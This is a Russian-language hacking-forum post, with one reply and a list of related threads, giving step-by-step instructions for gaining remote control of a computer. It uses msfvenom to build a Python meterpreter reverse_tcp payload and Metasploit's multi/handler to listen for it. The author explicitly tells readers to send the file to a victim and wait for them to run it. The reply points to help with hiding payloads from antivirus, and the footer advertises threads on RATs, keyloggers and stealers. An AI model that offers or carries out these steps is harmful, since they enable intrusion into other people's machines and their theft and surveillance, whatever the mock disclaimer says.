Интересно Metasploit и Python

1605624573403.png
Привет друзья. Более чем уверен, что большинство из вас знакомы с таким зАмаечательным фреймворком для пентеста как Metasploit Framework, а тем кто им пользуется изевстны такие понятия как meterpreter, payload, handler и тд. Про них собственно мы сегодня и поговорим. Про удаленный доступ через метасплоит и пайтон. Причем же тут пайтон? А при том что использовать мы будем полезную нагрузку на нем, для разнообразия так сказать.

Для сего кулинарно-компьютерного пиздеца нам понадобиться:
1. Собственно сам метасплоит
2. Установленный пайтон
3.И какая-нибудь дырка для выхода за пределы локалхоста, будь то VPN, статический ip, туннель , или выделенный сервер. Тут уж как-нибудь сами выберите, из того что есть под рукой. Лично я буду использовать туннель
И так, начнем
:

Как и любой немножечко умный повар мы начнем с подготовки главного ингредиента, проще говоря генерируем полезную нагрузку с помощью msfvenom. Так как использовать я буду payload на python, моя команда выглядит так:
msfvenom -p python/meterpreter/reverse_tcp lhost= ваш ip lport=порт > /home/eteriass/Desktop/payload_python.py



VirtualBox_ParrotHome_13_10_2020_22_15_36.png
Полезная нагрузка готова. Теперь нужно как то прослушивать порт , чтобы не проебать удаелнку. Запускаем метасплоит
  • msfconsole - тут без комментариев, все знают шо это
  • use exploit/multi/handler - это тот самый слушатель
  • set lhost XXXXXXXX - Это наш ip
  • set lport XXXXX - Это порт который нужно прослушивать
  • exploit - запуск прослушивания
Теперь отправляем файл жертве и ждем пока его запустят , после чего мы получим удаленный доступ к скомпрометированному компьютеру. VirtualBox_ParrotHome_13_10_2020_22_18_25.png
В моем случае ждать не пришлось, потому что жертвой был я сам, и как видите доступ получен.
Такие дела друзья. Метасплоит сам по себе очень мощный и интересный инструмент, владеть которым следует всем, начиная от пентестеров и до мамкиных черношляпников.
На этом пожалуй все и не забывайте, что статья написана только для ознакомления, и вообще все это фотошоп, монтаж, бред, БДСМ и другие умные слова. А автор писал под диктовку высших сил, и в душе не ебет че только что произошло, вот. А с вами был чумной доктор, чей ник в 2020-ом году звучит уже не так весело. Увидимся, ну, когда-нибудь...


P.s. Чисто спонтанно решил добавить водяные знаки, некоторые жители Казахстана тут совсем непричем
 
Последнее редактирование:
S

StanislavP

Ещё есть похожая

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

, но с анализом работы Meterpreter, reverse_tcp и прочих функций, которые работают на Python3. Это многим поможет найти ответ на вопрос по типу "Как закриптовать payload" или "почему антивирус ругается на файл".
 
Похожие темы
Eteriass Интересно Что такое koadic и почему не metasploit? Уязвимости и взлом 7
L Собираем информации о базах данных PostgreSQL используя Metasploit Уязвимости и взлом 0
K Metasploit для юнцов [Часть 1] Уязвимости и взлом 1
K PentestIT-Тестирование на проникновение с использованием Metasploit Framework https://cloud.mail.ru/public/HQgW/7oreizmBV Раздачи и сливы 0
K Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #2 Уязвимости и взлом 0
K Мануал: Скрытое управление компьютером на Windows (используя Metasploit) #1 Уязвимости и взлом 3
S Ошибка metasploit wmap Уязвимости и взлом 1
I Взлом удаленного доступа nmap + metasploit (Kali linux) Полезные статьи 1
I Взлом windows 7-10 с помощью setoolkit и metasploit (Kali Linux) Полезные статьи 4
E [Видео] Взламываем Android девайс с помощью Metasploit Уязвимости и взлом 1
B Введение в Metasploit Framework Уязвимости и взлом 4
Admin Взлом удаленного ПК. Veil-Evasion. Metasploit. Уязвимости и взлом 4
Admin Bypass UAC. Metasploit. Уязвимости и взлом 0
Admin Aналог Metasploit для роутеров Уязвимости и взлом 4
Support81 Резюме современного наркобарона: Python, SQL и умение убивать Новости в сети 0
Spark Разработка софта - боты\бруты\чекеры\парсеры и тд. BAS, Python, JS Ищу работу. Предлагаю свои услуги. 1
Little_Prince Интересно Напишу проекты [Open Bullet 1|2/Python 3] Готовый софт 0
CRC29A Ищу работу кодером [C++, Assembler, Python] Услуги дизайнеров и веб-разработчиков. 1
C Layer 4 DDOS Tool Python Спам / Флуд / Ддос 0
A Пишем свой RAT на Python > {Часть 1} Уязвимости и взлом 3
L Интересно Реверсим APK (Python-Kivy) Вирусология 4
ВЛАД013 ByPassCaptcha Python Программирование 0
L Интересно Шифруемся используя python (Крипто контейнеры и DPAPI) Программирование 0
G Бомбер для ПК на Python Готовый софт 3
I Python программист для разных задач. Ищу работу. Предлагаю свои услуги. 1
Anorali Свой мини кейлоггер на python. Часть 3 Вирусология 2
Anorali Свой мини кейлоггер на python. Часть 2 Вирусология 0
Anorali Свой мини кейлоггер на python Вирусология 4
_ZerO_ Интересно Python и LongPoll VK, или как запустить скрипт ВК и настроит Программирование 2
G Команда разработчиков - php, python, веб дизайн, программирование Ищу работу. Предлагаю свои услуги. 0
S Интересно CrazyPy - Пак самых нужных модулей для создания вирусов на python Программирование 6
E Интересно Бот с автооплатой на Python Программирование 10
S Интересно Свой мини-рат на python + стиллер хрома v80 Готовый софт 8
M Декомпиляция Python Программирование 1
M TBomb: Ещё один бомбер на python для termux Программирование 0
M Спам комментариями в ВК {PYTHON} Программирование 2
B [Udemy] Полное руководство по Python. Python Programming Bootcamp (2019) Программирование 4
M Защищаем свой Python скрипт за пару минут Программирование 0
M Разные винлокеры,на VBS и PYTHON Программирование 0
B Клиент-серверная игра на Python Полезные статьи 1
B Python. Полное руководство (2019) Полезные статьи 1
B Основы языка Python (2019) Полезные статьи 0
D Кодер ищет проекты/работу [Asm/C/Python] Ищу работу. Предлагаю свои услуги. 0
A Эликсир для программистов на Python Полезные статьи 0
A Что нового в Python 3.8? Полезные статьи 0
A Веб-очистка с BeautifulSoup в Python Программирование 0
G Python для хакера - Часть 4. Свой мини фреймворк. Программирование 1
G Python для хакера - Часть 3. Сбор информации об IP и пробиваем номер сотового. Программирование 1
G Python для хакера - Часть 2. Программирование 1
G Python для хакера - Часть 1. Начало. Программирование 5

Название темы